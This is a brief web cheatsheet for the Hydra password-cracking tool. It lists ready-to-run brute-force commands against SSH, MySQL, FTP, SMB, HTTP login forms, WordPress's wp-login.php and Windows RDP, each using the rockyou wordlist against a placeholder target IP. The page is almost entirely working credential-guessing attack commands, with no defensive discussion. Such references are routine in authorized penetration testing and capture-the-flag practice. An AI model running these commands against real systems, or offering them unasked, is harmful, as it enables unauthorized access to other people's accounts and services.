Skip to content

Hydra

https://noxtal.com/cheatsheets/2020/07/24/hydra-cheatsheet/

SSH

Bruteforce SSH credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh

MySQL

Bruteforce MySQL credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP mysql

FTP

Bruteforce FTP credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP ftp

SMB

Bruteforce SMB credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP smb

HTTP Post Form

Bruteforce web HTTP form

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

ex:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"

Wordpress

Bruteforce WordPress credentials

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Windows RDP

Bruteforce Windows Remote Desktop credentials

hydra -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP